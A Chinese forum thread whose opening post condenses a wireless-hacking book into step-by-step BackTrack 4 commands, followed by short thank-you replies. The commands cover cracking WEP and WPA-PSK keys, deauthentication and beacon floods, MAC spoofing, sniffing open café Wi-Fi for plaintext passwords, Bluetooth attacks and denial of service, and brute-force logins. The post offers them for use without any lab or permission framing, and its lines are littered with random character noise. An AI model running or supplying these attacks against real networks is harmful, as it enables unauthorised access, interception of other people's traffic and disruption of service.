查看: 10651|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3719

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
TG-NET
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。6 D7 [/ Q1 K: O/ [9 i
9 s2 e2 n+ g6 d9 O2 |
以下所有操作均在BackTrack 4中进行。; E4 A! b/ N5 ^/ v( @, o; r
5 I3 @. X% ?; Z! K

0 U' P. d; n5 a, }无线WEP加密P解:
: u+ j6 q, ^* S, f3 F. n# N- ^% s2 h
注入P解:0 Z3 z0 B$ p, `: G" Q! q
8 G, ?: Q+ x* m" F+ Q  u
ifconfig
$ n$ g1 ~1 _: q6 q
( W3 S" [* q* Z9 [+ _4 ~+ |! I. Q) Wifconfig –a
2 Z' {  V7 ?; M9 k) h
6 n6 {4 l/ ]( Q0 L5 i% u9 Kifconfig wlan0(无线网卡) up
6 |0 z" p( {; I) t& y4 l8 E1 ]! `9 b
airmon-ng start wlan0! D% j3 K6 q2 W* x
! {! @4 @. T/ O& r. }% T
airodump-ng mon0
4 V) K4 H# u" ^4 L: A
9 p) H2 J( f3 pairodump-ng --ivs –w ivsfile –c 频道 mon0或
* C0 y1 c6 h/ |3 x5 |9 ^* C1 {+ D/ K+ W4 [& R' O
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0; v! A$ e: w) |: W8 R. x  q
$ Q6 r. M/ c6 p% y. o
aireplay-ng -3 –b BSSID –h Station mon0
  t) n; G2 y3 |* A! O( P8 C6 M) `" P0 _& n9 I& ?( G
aircrack-ng ivsfile-01.ivs
: s! v2 G$ R4 f) j. e
! X, |( H3 s, l7 N虚连接P解(适用于无客户端连接APP解)
1 e2 f: O) k& f2 h
# C. O0 [4 v* C# ~* eifconfig
0 r: B! _! R9 T8 h' d& E% F
! N: X  E1 W9 \ifconfig –a8 m3 Q- I0 }% B& r0 K& g* _

6 o  k3 z) f: w$ w/ a/ jifconfig wlan0(无线网卡) up
3 v& ^) U0 T' a) L% g* {9 Y4 a2 s: x" ?# n
airmon-ng start wlan05 A: B) C* O# N" c6 |: r

  e' [& J1 B9 fairodump-ng mon0
0 W5 S, M' }1 I* {
* h. F+ l# r! q4 D4 L; `* Kairodump-ng --ivs –w ivsfile –c 频道 mon0或
  w4 X; |  p+ z& s- h' J
' H! l' [! h; f3 u' O7 }- Eairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
9 A, W2 ^# |% f4 t9 ^4 B( G& ~- u2 m2 H% e; I; H" D  o% T
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
" X' G  n) O; V- g  H( U: M# `, o9 l4 z  D# u- R8 I# f6 w9 M
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon07 g3 I' Z* B& q! e, o2 C0 f
6 t$ G# B4 h6 t9 S. l
aircrack-ng ivsfile-01.ivs
4 A& i' f) n) p2 Q. y! X  s* R  h1 {# u( Z# f# I: u
* Q5 u2 R# q4 k$ S2 O
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
5 r/ R3 @& \, z" S
* x8 _3 D- M- ]2 R, Z) l1 O: b. _. a+ o& O
WPA-PSKP解9 S. [1 M; O5 g% Z- x1 ^

* _+ M2 j" u  S, F) @4 W2 X# S  Pifconfig
! V+ n6 {! t9 O  o7 \
( u' I! Y) I% ~* Uifconfig –a' L1 }6 P+ R- x/ Y5 h' x% j: K
6 \" U  m# x+ u* L
ifconfig wlan0(无线网卡) up# ?- Y2 o% \" @6 i( K
4 c1 m9 I4 r2 P' ~, D- H
airmon-ng start wlan0( r1 u4 Z: N" a6 |" B6 ]& U

+ p0 h- n2 |7 r) c0 d7 m7 c8 Q& Uairodump-ng mon0
: N9 x( _, m! N; s& G- q) F" _/ Q; D+ I4 D7 [
airodump-ng –w capfile –c 频道 mon0
8 E7 n0 T% y/ o- v) V( X( H
. J' l3 p  J/ y+ Z: I2 uaireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
( o& T( O- {: L; Q9 K( N  b/ L  a% H& [& _3 q1 ^$ z( H
aircrack-ng –w Dic capfile-01.cap或1 R: O/ G3 t9 B& \5 A8 V

" I) t+ X$ s! g% mcowpatty –f Dic –r capfile-01.cap –s SSID
- J7 n3 r$ Q2 U9 k( S$ |  Q6 l" n& d' [
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID/ l2 }. w# D2 e& I" `
" m; a( j, k$ a7 l$ B
傻瓜式P解软件SpoonWPA。3 @3 F! @, O3 w* y6 a

2 ^* O7 ^4 Z9 vBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst  ^- ~. P) Y( d- D- p
$ q. f. a* e# t* M3 c7 \/ h4 ~% S5 _
; |; y; ]+ i% q( y
字典文件的生成和上传
. |6 P  P' V( m; @
6 H4 l8 m& q0 V! [在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。- Q9 m' a$ S1 L- N! \  M
$ B- C# T* N/ E

' c" N! Q2 x, v/ ~8 UBT4下开启Tftp:Services—TFTPD—start TFTPD
: b# I. m0 C4 F7 [8 S# x" v* I+ Z" X+ p; o5 z
在Windows的CMD中运行 tftp –i IP put **.dic5 [; f+ `( x+ Z0 X1 g

: u4 t0 B, Z/ {2 j
0 J$ m9 D  c4 |  I% q5 C, [. `! Z/ LBT4下开启SSH:Services—SSH—start SSH
8 C. t( r# x# `4 c2 e+ s9 h7 ^
& X1 ]! F! e6 r9 p* E+ ^Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root9 J! [& i4 \7 |

- ?" M& i0 ^; \5 x* B* O0 I1 V2 Q% D
AP限制MAC时的解决
4 |% ^* v$ V; P4 X
9 `& t+ G  t2 J( b; T3 C( b& Q当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:; V+ \- T/ P1 `, T; B; D4 ?
0 w$ p9 u! G) u( s; W" X. L& L( C5 i
ifconfig wlan0 hw ether NewMAC
- d) `, A5 ]" O7 _7 G
; F* d5 [/ m+ _( P+ H$ `3 F7 ^$ m/ N$ G' b- z1 u. ^/ a
关闭SSID广播的AP探测:
: o# l) c  N# ~: _; ]( W! ^# o5 x( F  Y  `9 o& r
1.     Deauth攻击:4 E/ \) A, j& F) U' L4 x
6 @$ E8 M; F; @" ^5 W
airodump-ng mon0
( f% Q3 b6 _1 Z: T4 {5 Q" Z5 e9 y0 z, @; \: K! G
aireplay-ng -0 10 –a BSSID –h Station mon0
1 L+ B+ g1 V) A! t% e5 q+ q* e2 S$ b1 l* S6 b0 _) d
2.     抓包分析
. f$ U4 Z  e( F; C# |2 O8 u7 b7 [6 t+ j7 q7 N+ p  v% C& _8 k
Omnipeek7 y4 Z& E& T- n) R) G9 f' M; u

2 ^' p$ T3 @7 D5 YTcpdump –n –e –vvv –i 网卡名
" D8 Q2 T* o5 y! Y' \1 A6 A% P2 w2 B9 G7 F0 A2 a! t
3.     暴力P解
' G* I' a( [' N* A/ j% h/ E$ s- K
/ X0 M5 z$ M: _) x1 v5 W9 qCharon 1.1暴力P解& l* }9 }3 I1 V6 Q  d. d, ]
, e8 V4 Y8 y- X* N5 l: Z% S
, e2 n$ r3 x& u! c3 S  S
无线加密数据包的解密5 }( ?( |. V1 ^+ Y

& X+ ~2 S' ?0 ]3 C: C% Z) T! v/ F" ~6 N
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
9 f) k/ X! B4 `+ A' V  d% H, `- |" p
% Y8 E8 V' c; B9 z. O. I% m3 ~3 H; `FilterNS     DNS解析数据包. G+ l0 U' }6 Z3 z# b

- M0 j& Q# v7 z# D" z$ HFilter:HTTP    WEB访问数据包, j0 R$ z( A5 }. ~2 x2 w! o
8 N0 [' v! A+ y# l
Filter:msnms   MSN, V, c/ m  F; V" f
- S  v) p9 h7 F8 x  y9 v
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。1 b/ M' Y' |( g
- J9 @! s  ]7 h8 Z. O+ S2 m3 H
使用airdecap-ng解密:# E4 A" h) x$ I+ k" U& a& z! U& L2 T
! A7 j% O  w) S
Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap8 F5 Y' w7 J2 Z6 d6 ]* [
0 U6 I- I. d% \0 W
0 ]$ N5 U' R- x2 `
咖啡馆中无线数据截取(开放式无加密AP)
$ h. q; r! }1 v( y0 ?, _
) A: Q; }% A/ J; ^9 J( n" [1.Airodump-ng –w data –c频道 mon0
  _3 ^# o3 @' w$ f( F, K, T& \5 ]: ~- a
2.使用WireShark打开分析
3 ?/ l6 d6 J/ }3 R
- g/ u+ j+ P$ }: q3 ]/ m  w3 [
" _4 k& H2 l, Y  CBT4下的渗透工具:
3 i* M# a- [2 T8 S- m; |+ u% A7 o! ]" e( M) v+ X# X
nmap –sP IP/24        判断C段下存活的主机
. T4 {9 A) n+ `1 E1 A0 Z/ k
, t- s7 I2 s4 T. Hnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放& R" O7 E6 _' [3 g
+ M0 O$ r: D  e" T2 l7 A) `
nmap –vv –sV IP –p port   指定端口的详细信息。。。
- }( f& E2 n& x2 p5 N8 X. f
( w1 @9 s. G( J% B! lnamp –O IP/24    判断主机的系统版本
1 T* h6 n7 [- {$ J. x+ J$ b* H
" e" ]1 `5 i9 Y  r: M$ \3 O
; a9 l+ t; h7 n  l! D" d$ v4 e0 dGUI 版nmap:Zenmap ! M( R' [' X4 f% n: T
9 R& [! K' M( c  G9 N

0 `' [+ G5 ^* N" W* P8 J7 HAmap使用:amap –B IP port' X- M0 ~' @0 \- w1 }

# ^4 a1 B- b8 xNbtscan(扫描Windows网络NetBios信息):/ l! r+ S! X: D  Q. ^) Z$ `  X

0 C  Z7 n* p) M, ~+ ?/ u) X: qnbtscan –v –s : IP/24
2 [6 l& q+ ^9 z4 v5 c( }
$ }' q9 ]6 B% M/ f  Enbtscan –r IP
! \( \- I( _0 h- _* e' j5 V" r
1 }, c( n# H) O, R& N7 i  ?! O6 B- W; M, ^7 z+ i, }: H
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.3 {$ Z# _/ H* U
# W: c( Y, N+ T- w6 D, S5 h
2 I* r* g6 U+ Z; M
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)" |* B7 n/ ]$ y0 x1 M+ }

3 W8 f* i4 {& @( E& }+ n% nBruteSSH: ./bruthe.py –h IP –u Username –d Dic' M( _  X' F0 o
% U4 Z2 R1 n5 |0 ]  y& K
Metasploit3使用5 H3 `$ Y; ]* X. G1 _
无线D.0.S
7 l' V, E5 L4 l2 ]) H" R
9 E& J: c4 M) H8 |4 d' t5 w# _" o  v, C+ P
! v/ O& k6 A+ A- @( J+ bAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)$ ~7 C9 [+ V& J6 q- A8 V
) ~& d& z  U6 R1 O( u8 z6 R9 U: Y
airmon-ng start wlan0
" R* e/ B' d8 d1 I( G  l& n: |1 z* V; O5 w* c8 _, p
airodump-ng mon0
) V; B4 T* y- t3 ?1 W
0 e" ^5 o& j" w! E: q$ Cmdk3 mon0 a –a BSSID
( @' P8 X4 g' |
, V" m' U# [$ c+ |对所有的AP攻击:mdk3 mon0 a
" S: F, a8 n  _7 b! p' j* O" V3 o( G5 n% j. e# \5 f

4 H' M$ g9 V; W# h- k6 dDeauth Flood 攻击
, E+ O/ c! B0 ~: C. D
3 |* j8 C& f; ~- O8 Q- V( {7 Amdk3 mon0 d –c Channel
7 H+ W; _  D' a" p: D2 a
* U  s) Q, e8 I6 D. A( ]+ f" ~图形化D.O.S攻击:Charon
+ t! T2 x  C" z' K8 @5 x9 W; X) Z- A! B- G; D

6 X2 g1 p( y' x( h, d2 o0 v* I当受到攻击时,使用Wireshark抓包可以看到异常信息。
) n) q* y- f9 s4 T) B
6 y1 i. i; |( E& \* ?: g) x" Z! e( b, K& ]6 w! k% q; t
WPA-PSK高速P解
' E# F* {# z! }9 z1 k* P# p# D% C$ z
1.       WPA-PSK PMK Hash TablesP解
1 \3 E, S  z" K: F  O8 b) }3 m0 g: a: o
Cowpatty –d HashTable.hash –r ***.cap –s SSID2 v/ O, w( X/ M' Q- j; \8 A
8 O3 k  j4 n: r8 u6 I& _  h
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID7 Y1 ?# P0 ^4 T6 p. F2 D
- ^; X2 ~  i. Z5 F% {
2.       GPU辅助高速P解
6 x( C  G; e5 T+ J. T& }8 {3 c1 J) E! ^; o5 n' J
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
( ?, r4 f! L: R' q1 d
/ C6 P4 S- |& h( |3.       分布式P解
6 g( c+ D1 `6 O5 e
! o8 D2 }) M2 Y' _5 h6 x7 I; S3 V% E" V! u" _" P
AP的伪造( W2 C# c+ J- u3 p# t. }% {
) K' K$ d+ v8 Y# E4 k' Y% M( S
把AP的MAC改成目标AP的MAC
1 N( Y+ `6 z9 L/ d) N
4 d, `: f- {3 H, g2 e网卡软AP
  b" C5 V! g1 Q$ t- D& }* ^# ]' U4 {

+ e  H0 j9 ?! {1 h伪造大量虚假AP信号:7 u- V7 m& A8 X& {4 _: W1 m, B3 q

* s9 S3 h2 y9 T: F6 o7 w随机SSID:mdk3 mon0 b –g –c 频道 8 s. J) |5 i9 D/ w+ t5 P! o0 ^
6 v! v7 y6 T& j! l  M1 |) h& a6 d& k0 |
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
' `+ L9 }& R3 ^: n* Z3 X/ Q' A
, a" v+ v, M: \% K, A6 I1 e( T2 r. E8 s
War-Driving1 P6 p  u' f5 g: g" x" v# T

+ }5 Q6 [" y  z热点地图绘制
/ `+ H1 N) o6 t1 k$ R! b( V  Y) Y% g, ]3 u: F
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。9 B# D: e5 i- Q% ^3 `; H
  ?1 }3 v2 ~% I6 z) L

1 Q: V( T+ n& L1 XNetstumble9 i, u+ k  X: n  r/ V; k

- L2 ]5 c3 ^# r) p: o3 d1 L4 r1 g7 A# Y9 \8 C) W1 I/ C- w. A
蓝牙Hacking( Y1 W) v& V6 F* Y2 C

4 c  |9 i# x& A) }: w7 LWindows下的Blue Soleil工具
5 ^9 A" K" R- r- r) |. E/ T* h6 Y5 E
BT4:2 I: h' s8 A, Q, |- H8 B; i$ E
6 x; e/ m6 o- |9 Z! I9 [( h
hciconfig 查看蓝牙适配器
5 D: c% v/ [0 l6 O( Q/ c% C# p# M8 m: T* |5 k' }# T
hciconfig hci0 up 载入蓝牙适配器5 _% R+ M' S3 F' ~. w# f
" h$ q$ ]% A# K8 I8 @
hciconfig hci0 class 蓝牙适配器详细信息
3 t- o& b* F/ I9 e/ c$ O- ~- `0 m/ J/ b
. U6 V9 ]  P( T& q) ]1 X/ N
hcitool(扫描蓝牙)
5 y. d$ }4 g7 @1 Q( p6 s
5 P! h( T; W3 t6 d/ s3 b! Chcitool –i hci0 scan. W1 l& j3 t4 {" d$ y2 A) B( c$ ^
" e$ V; _! v, M" V: [" T
BTscanner(扫描蓝牙)
2 ^/ ?# v5 M" g1 L# i
0 L4 j7 C2 g. g! h$ g. l' o% o* {6 z7 J0 u) z1 R. W
蓝牙攻击:
4 _( S6 C. Y8 d7 D  t/ {% b' i
+ X0 ~3 a; C0 |) M7 ZBlueBugging (适用于BlueTooth V1.1的手机)
2 ~- }' p$ y0 _  y- N; y2 ~( M& \- |" y% D$ R# r8 C5 t6 t
Bluebugger工具:) S; f( n8 `! ~. `9 k& A: K! M

; M2 P2 C& ~5 ]Bulebugger –a HD_Addr info
, J; G* }; u& W) _% l* e' H" k2 I- H7 ~3 a3 o! a* X
% d2 ]: E  T% u$ `+ s: j
BlueJacking8 ~5 L1 R) k0 Q; S  A/ E

, ^: l# I% j' r实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
" ]1 t2 R1 W4 ?* I6 K, `# |& u4 u* k2 t* N4 p, B2 P- D

) I4 o# G) C& c- }9 l# LHD_Addr修改:
+ c, y7 l3 x1 C$ T9 c- I8 R8 \. R2 j2 o9 H2 c
Bdaddr工具
& S5 h5 Q5 R5 r' i
  y6 O5 L4 q/ h8 Y: z5 vbdaddr –i 蓝牙设备名 新HD_addr
3 [$ T0 X3 l6 R& }3 W- W0 o% @2 e- ?. Y9 F

% L$ H' v& c$ {" V' V7 b) q/ M. [蓝牙D.O.S
  Q( L1 l1 z6 X, i3 ?
  n# ?6 d1 m' M- T8 v5 j) Sl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务% T5 \3 [" F: @
2 Q  E2 u0 p. }# Y9 M2 S5 T
hciconfig
, U, Z6 U# P$ h  K- [4 w# N% ]) ?4 M! Q' m; B. ]/ e. n9 X
hciconfig hci0 up) g! |$ P( X7 a  G1 `8 W: l& h; J
5 u3 x1 ^" {9 S/ b0 ]: Q$ k
hcitool –i hci0 scan
9 O; s; X1 h6 a& E+ q& C& c0 Z% \+ @) B% ]( Y, M+ `' H7 A7 _
l2ping –s 10000 –目标MAC
9 u3 ?7 B5 _. N% z, |3 k* E
4 G0 G+ p- F* l2 m+ v& A0 i( N  E. U/ O
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
+ }# X' B7 P% e5 r" z* {& J  ~7 I* T; J# ^
./fang –r ************-############ -s4 M1 V! P- v- |
& A$ G# A: a/ l( F( |: Y3 ^
暴力P解************-############的蓝牙设备
8 j/ I* y" I- c* d% g8 b4 t* D7 n9 L/ @% k  }% V1 ?, d
./fang –l 各厂商BD_Addr分配/ T* v* `! w3 y

# o8 @# d" o/ i
! y1 c# _- R2 s* }5 u  J- vWifiZoo使用
. O6 i( N  {, n6 R" k7 o, Q: m7 }) m, o& o" Y4 F( G8 |
./wifizoo.py –c Capfile+ L4 Q2 J. R. J" q) P

6 H; |$ o0 d! N8 [: V访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

140

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

907

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。* e/ o8 E+ e/ O) q) k
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的% ]5 b" m! Z( l/ E
呵呵 其实也不贵 21块 快递再一点
5 X+ \+ L1 F" \& a: [我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2016-9-29 14:40

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表